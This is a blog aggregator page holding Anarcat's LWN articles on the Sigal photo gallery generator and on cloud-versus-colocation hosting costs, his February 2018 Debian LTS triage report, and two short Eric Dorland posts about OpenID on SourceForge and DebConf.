Before starting a new project from scratch, Conseil first looked for alternatives ("Gallerize, lazygal, and a few others") but couldn't find anything satisfactory. He wanted to reuse ideas from Pelican, for example the Jinja2 template engine for themes and the Blinker plugin system, so he started his own project.

Like other static gallery generators, Sigal parses a tree of images and generates thumbnails and HTML pages to show those images. Instead of deploying its own custom JavaScript application for browsing images in the browser, Sigal reuses existing applications like Galleria, PhotoSwipe, and Colorbox. Image metadata is parsed from Exif tags, but a Markdown-formatted text file can also be used to change image or album titles, description, and location. The latest 1.4 release can also read metadata from in-image IPTC tags. Sigal parses regular images using the Pillow library but can also read video files, which get converted to browser-readable video files through the ubiquitous FFmpeg. Sigal has good (if minimal) online documentation and, like any good Python program, can be installed with pip; I am working on packaging it for Debian.

Plugins offer support for image or copyright watermarks. The adjust plugin also allows for minor image adjustments, although those apply to the whole gallery so it is unclear to me how useful that plugin really is. Even novice photographers would more likely make adjustments in a basic image editor like Shotwell, digiKam, or maybe even GIMP before trying to tweak images in a Python configuration file. Finally, another plugin provides a simple RSS feed, which is useful to allow users to keep track of the latest images published in the gallery.

Future plans and limitations

When I asked him about future plans, Conseil said he had "no roadmap":

For me Sigal has been doing its job for a long time now, but the cool thing is that people find it useful and contribute. So my only wish is that this continues and to help the project live for and by its community, which is slowly growing.

Following this lead, I submitted patches and ideas of my own to the project while working on this article. The first shortcoming I have found with Sigal is the lack of access control. A photo gallery is either private or world-readable; there is no way to restrict access to only some albums or photos. I found a way, however, to implement folder password protection using the Basic authentication type for the Apache web server, which I documented in an FAQ entry. It's a little clunky as it uses password files managed through the old htpasswd command. It also means using passwords and, in my usability tests, some family members had trouble typing my weird randomly generated passwords on their tablets. I would have preferred to find a way to use URL-based authentication, with an unguessable one-time link, but I haven't found an easy way to do this in the web server. It can be done by picking a random name for the entire gallery, but not for specific folders, because those get leaked by Sigal. To protect certain pictures, they have to be in a separate gallery, which complicates maintenance.

Which brings us to gallery operation: to create a Sigal gallery, you need to create a configuration file and run the sigal build command. This is pretty simple but I think it can be made even simpler. I have proposed having a default configuration file so that creating a configuration file isn't required to make new galleries. I also looked at implementing a "daemon" mode that would watch a directory for changes and rebuild when new pictures show up. For now, I have settled on a quick hack based on the entr utility but there's talk of implementing the feature directly in the build command. Such improvements would enable mass hosting of photo galleries with minimal configuration. It would also make it easier to create password-less private galleries with unique, unguessable URLs.

Another patch I am working on is the stream plugin, which creates a new view of the gallery; instead of a folder-based interface, this shows the latest pictures published as a flat list. This is how commercial services like Instagram and Flickr work; even though you can tag pictures or group them by folder, they also offer a unified "stream" view of the latest entries in a gallery. As a demonstration of Sigal's clean design, I was able to quickly find my way in the code base to implement the required changes to the core libraries and unit tests, which are now waiting for review.

In closing, I have found Sigal to be a simple and elegant project. As it stands, it should be sufficient for basic galleries, but more demanding photographers and artists might need more elaborate solutions. Ratings, comments, and any form of interactivity will obviously be difficult to implement in Sigal; fans of those features should probably look at CMS solutions like Piwigo or the new Lychee project. But dynamic features are perhaps best kept to purpose-built free software like Discourse that embeds dynamic controls in static sites. In any case, for a system administrator tired of maintaining old software, the idea of having only static web sites to worry about is incredibly comforting. That simplicity and reliability has made Sigal a key tool in my amateur photographer toolbox.

A set of demos is available for readers who want to see more themes and play around with a real gallery.

This article first appeared in the Linux Weekly News.

Categories: External Blogs

February 2018 report: LTS, ...

Anarcat - Thu, 03/01/2018 - 12:07
Debian Long Term Support (LTS)

This is my monthly Debian LTS report. This month was exclusively dedicated to my frontdesk work. I actually forgot to do it the first week and had to play catchup during the weekend, so I brought up a discussion about how to avoid those problems in the future. I proposed an automated reminder system, but it turns out people found this was overkill. Instead, Chris Lamb suggested we simply send a ping to the next person in the list, which has proven useful the next time I was up. In the two weeks I was frontdesk, I ended up triaging the following notable packages:

  • isc-dhcp - remote code execution exploits - time to get rid of those root-level daemons?
  • simplesamlphp - under embargo, quite curious
  • golang - the return of remote code execution in go get (CVE-2018-6574, similar to CVE-2017-15041 and CVE-2018-7187) - ended up being marked as minor, unfortunately
  • systemd - CVE-2017-18078 was marked as unimportant as this was neutralized by kernel hardening and systemd was not really in use back in wheezy. besides, CVE-2013-4392 was about a similar functionality which was claimed to not be supported in wheezy. i did, however, proposed to forcibly enable the kernel hardening through default sysctl configurations (Debian bug #889098) so that custom kernels would be covered by the protection in stable suites.

There were more minor triage work not mentioned here, those are just the juicy ones...

Speaking of juicy, the other thing I did during the month was to help with the documentation on the Meltdown and Spectre attacks on Intel CPUs. Much has been written about this and I won't do yet another summary. However, it seems that no one actually had written even semi-official documentation on the state of fixes in Debian, which lead to many questions to the (LTS) security team(s). Ola Lundqvist did a first draft of a page detailing the current status, and I expanded on the page to add formatting and more details. The page is visible here:

https://wiki.debian.org/DebianSecurity/SpectreMeltdown

I'm still not fully happy with the results: we're missing some userland like Qemu and a timeline of fixes. In comparison, the Ubuntu page still looks much better in my opinion. But it's leagues ahead of what we had before, which was nothing... The next step for LTS is to backport the retpoline fixes back into a compiler. Roberto C. Sanchez is working on this, and the remaining question is whether we try to backport to GCC 4.7 or we backport GCC 4.9 itself into wheezy. In any case, it's a significant challenge and I'm glad I'm not the one dealing with such arcane code right now...

Other free software work

Not much to say this month, en vrac:

  • did the usual linkchecker maintenance
  • finally got my Prometheus node exporter directory size sample merged
  • added some docs updating the Dat project comparison with IPFS after investigating Dat. Turns out Dat's security garantees aren't as good as I hoped...
  • reviewed some PRs in the Git-Mediawiki project
  • found what I consider to be a security issue in the Borg backup software, but was disregarded as such by upstream. This ended up in a simple issue that I do not hope much from.
  • so I got more interested in the Restic community as well. I proposed a code of conduct to test the waters, but the feedback so far has been mixed, unfortunately.
  • started working on a streams page for the Sigal gallery. Expect an article about Sigal soon.
  • published undertime in Debian, which brought a slew of bug reports (and consequent fixes).
  • started looking at alternative GUIs because GTK2 is going a way and I need to port two projects. I have a list of "hello world" in various frameworks now, still not sure which one I'll use.
  • also worked on updating the Charybdis and Atheme-services packages with new co-maintainers (hi!)
  • worked with Darktable to try and render an exotic image out of my new camera. Might turn into a LWN article eventually as well.
  • started getting more involved in the local free software forum, a nice little community. In particular, i went to a "repair cafe" and wrote a full report on the experience there.

I'm trying to write more for LWN these days so it's taking more time. I'm also trying to turn those reports into articles to help ramping up that rhythm, which means you'll need to subscribe to LWN to get the latest goods before the 2 weeks exclusivity period.

Categories: External Blogs

The cost of hosting in the cloud

Anarcat - Wed, 02/28/2018 - 12:00

This is one part of my coverage of KubeCon Austin 2017. Other articles include:

Should we host in the cloud or on our own servers? This question was at the center of Dmytro Dyachuk's talk, given during KubeCon + CloudNativeCon last November. While many services simply launch in the cloud without the organizations behind them considering other options, large content-hosting services have actually moved back to their own data centers: Dropbox migrated in 2016 and Instagram in 2014. Because such transitions can be expensive and risky, understanding the economics of hosting is a critical part of launching a new service. Actual hosting costs are often misunderstood, or secret, so it is sometimes difficult to get the numbers right. In this article, we'll use Dyachuk's talk to try to answer the "million dollar question": "buy or rent?"

Computing the cost of compute

So how much does hosting cost these days? To answer that apparently trivial question, Dyachuk presented a detailed analysis made from a spreadsheet that compares the costs of "colocation" (running your own hardware in somebody else's data center) versus those of hosting in the cloud. For the latter, Dyachuk chose Amazon Web Services (AWS) as a standard, reminding the audience that "63% of Kubernetes deployments actually run off AWS". Dyachuk focused only on the cloud and colocation services, discarding the option of building your own data center as too complex and expensive. The question is whether it still makes sense to operate your own servers when, as Dyachuk explained, "CPU and memory have become a utility", a transition that Kubernetes is also helping push forward.

Another assumption of his talk is that server uptime isn't that critical anymore; there used to be a time when system administrators would proudly brandish multi-year uptime counters as a proof of server stability. As an example, Dyachuk performed a quick survey in the room and the record was an uptime of 5 years. In response, Dyachuk asked: "how many security patches were missed because of that uptime?" The answer was, of course "all of them". Kubernetes helps with security upgrades, in that it provides a self-healing mechanism to automatically re-provision failed services or rotate nodes when rebooting. This changes hardware designs; instead of building custom, application-specific machines, system administrators now deploy large, general-purpose servers that use virtualization technologies to host arbitrary applications in high-density clusters.

When presenting his calculations, Dyachuk explained that "pricing is complicated" and, indeed, his spreadsheet includes hundreds of parameters. However, after reviewing his numbers, I can say that the list is impressively exhaustive, covering server memory, disk, and bandwidth, but also backups, storage, staffing, and networking infrastructure.

For servers, he picked a Supermicro chassis with 224 cores and 512GB of memory from the first result of a Google search. Once amortized over an aggressive three-year rotation plan, the $25,000 machine ends up costing about $8,300 yearly. To compare with Amazon, he picked the m4.10xlarge instance as a commonly used standard, which currently offers 40 cores, 160GB of RAM, and 4Gbps of dedicated storage bandwidth. At the time he did his estimates, the going rate for such a server was $2 per hour or $17,000 per year. So, at first, the physical server looks like a much better deal: half the price and close to quadruple the capacity. But, of course, we also need to factor in networking, power usage, space rental, and staff costs. And this is where things get complicated.

First, colocation rates will vary a lot depending on location. While bandwidth costs are often much lower in large urban centers because of proximity to fast network links, real estate and power prices are often much higher. Bandwidth costs are now the main driver in hosting costs.

For the purpose of his calculation, Dyachuk picked a real-estate figure of $500 per standard cabinet (42U). His calculations yielded a monthly power cost of $4,200 for a full rack, at $0.50/kWh. Those rates seem rather high for my local data center, where that rate is closer to $350 for the cabinet and $0.12/kWh for power. Dyachuk took into account that power is usually not "metered billing", when you pay for the actual power usage, but "stepped billing" where you pay for a circuit with a (say) 25-amp breaker regardless of how much power you use in said circuit. This accounts for some of the discrepancy, but the estimate still seems rather too high to be accurate according to my calculations.

Then there's networking: all those machines need to connect to each other and to an uplink. This means finding a bandwidth provider, which Dyachuk pinned at a reasonable average cost of $1/Mbps. But the most expensive part is not the bandwidth; the cost of managing network infrastructure includes not only installing switches and connecting them, but also tracing misplaced wires, dealing with denial-of-service attacks, and so on. Cabling, a seemingly innocuous task, is actually the majority of hardware expenses in data centers, as previously reported. From networking, Dyachuk went on to detail the remaining cost estimates, including storage and backups, where the physical world is again cheaper than the cloud. All this is, of course, assuming that crafty system administrators can figure out how to glue all the hardware together into a meaningful package.

Which brings us to the sensitive question of staff costs; Dyachuk described those as "substantial". These costs are for the system and network administrators who are needed to buy, order, test, configure, and deploy everything. Evaluating those costs is subjective: for example, salaries will vary between different countries. He fixed the person yearly salary costs at $250,000 (counting overhead and an actual $150,000 salary) and accounted for three people on staff. Those costs may also vary with the colocation service; some will include remote hands and networking, but he assumed in his calculations that the costs would end up being roughly the same because providers will charge extra for those services.

Dyachuk also observed that staff costs are the majority of the expenses in a colocation environment: "hardware is cheaper, but requires a lot more people". In the cloud, it's the opposite; most of the costs consist of computation, storage, and bandwidth. Staff also introduce a human factor of instability in the equation: in a small team, there can be a lot of variability in ability levels. This means there is more uncertainty in colocation cost estimates.

In our discussions after the conference, Dyachuk pointed out a social aspect to consider: cloud providers are operating a virtual oligopoly. Dyachuk worries about the impact of Amazon's growing power over different markets:

A lot of businesses are in direct competition with Amazon. A fear of losing commercial secrets and being spied upon has not been confirmed by any incidents yet. But Walmart, for example, moved out of AWS and requested that its suppliers do the same.

Demand management

Once the extra costs described are factored in, colocation still would appear to be the cheaper option. But that doesn't take into account the question of capacity: a key feature of cloud providers is that they pool together large clusters of machines, which allow individual tenants to scale up their services quickly in response to demand spikes. Self-hosted servers need extra capacity to cover for future demand. That means paying for hardware that stays idle waiting for usage spikes, while cloud providers are free to re-provision those resources elsewhere.

Satisfying demand in the cloud is easy: allocate new instances automatically and pay the bill at the end of the month. In a colocation, provisioning is much slower and hardware must be systematically over-provisioned. Those extra resources might be used for preemptible batch jobs in certain cases, but workloads are often "transaction-oriented" or "realtime" which require extra resources to deal with spikes. So the "spike to average" ratio is an important metric to evaluate when making the decision between the cloud and colocation.

Cost reductions are possible by improving analytics to reduce over-provisioning. Kubernetes makes it easier to estimate demand; before containerized applications, estimates were per application, each with its margin of error. By pooling together all applications in a cluster, the problem is generalized and individual workloads balance out in aggregate, even if they fluctuate individually. Therefore Dyachuk recommends to use the cloud when future growth cannot be forecast, to avoid the risk of under-provisioning. He also recommended "The Art of Capacity Planning" as a good forecasting resource; even though the book is old, the basic math hasn't changed so it is still useful.

The golden ratio

Colocation prices finally overshoot cloud prices after adding extra capacity and staff costs. In closing, Dyachuk identified the crossover point where colocation becomes cheaper at around $100,000 per month, or 150 Amazon m4.2xlarge instances, which can be seen in the graph below. Note that he picked a different instance type for the actual calculations: instead of the largest instance (m4.10xlarge), he chose the more commonly used m4.2xlarge instance. Because Amazon pricing scales linearly, the math works out to about the same once reserved instances, storage, load balancing, and other costs are taken into account.

He also added that the figure will change based on the workload; Amazon is more attractive with more CPU and less I/O. Inversely, I/O-heavy deployments can be a problem on Amazon; disk and network bandwidth are much more expensive in the cloud. For example, bandwidth can sometimes be more than triple what you can easily find in a data center.

Your mileage may vary; those numbers shouldn't be taken as an absolute. They are a baseline that needs to be tweaked according to your situation, workload and requirements. For some, Amazon will be cheaper, for others, colocation is still the best option.

He also emphasized that the graph stops at 500 instances; beyond that lies another "wall" of investment due to networking constraints. At around the equivalent of 2000-3000 Amazon instances, networking becomes a significant bottleneck and demands larger investments in networking equipment to upgrade internal bandwidth, which may make Amazon affordable again. It might also be that application design should shift to a multi-cluster setup, but that implies increases in staff costs.

Finally, we should note that some organizations simply cannot host in the cloud. In our discussions, Dyachuk specifically expressed concerns about Canada's government services moving to the cloud, for example: what is the impact on state sovereignty when confidential data about its citizen ends up in the hands of private contractors? So far, Canada's approach has been to only move "public data" to the cloud, but Dyachuk pointed out this already includes sensitive departments like correctional services.

In Dyachuk's model, the cloud offers significant cost reduction over traditional hosting in small clusters, at least until a deployment reaches a certain size. However, different workloads significantly change that model and can make colocation attractive again: I/O and bandwidth intensive services with well-planned growth rates are clear colocation candidates. His model is just a start; any project manager would be wise to make their own calculations to confirm the cloud really delivers the cost savings it promises. Furthermore, while Dyachuk wisely avoided political discussions surrounding the impact of hosting in the cloud, data ownership and sovereignty remain important considerations that shouldn't be overlooked.

A YouTube video and the slides [PDF] from Dyachuk's talk are available online.

This article first appeared in the Linux Weekly News, under the title "The true costs of hosting in the cloud".

Categories: External Blogs

Epic Lameness

Eric Dorland - Mon, 09/01/2008 - 17:26
SF.net now supports OpenID. Hooray! I'd like to make a comment on a thread about the RTL8187se chip I've got in my new MSI Wind. So I go to sign in with OpenID and instead of signing me in it prompts me to create an account with a name, username and password for the account. Huh? I just want to post to their forum, I don't want to create an account (at least not explicitly, if they want to do it behind the scenes fine). Isn't the point of OpenID to not have to create accounts and particularly not have to create new usernames and passwords to access websites? I'm not impressed.
Categories: External Blogs

Sentiment Sharing

Eric Dorland - Mon, 08/11/2008 - 23:28
Biella, I am from there and I do agree. If I was still living there I would try to form a team and make a bid. Simon even made noises about organizing a bid at DebConfs past. I wish he would :)

But a DebConf in New York would be almost as good.
Categories: External Blogs
Syndicate content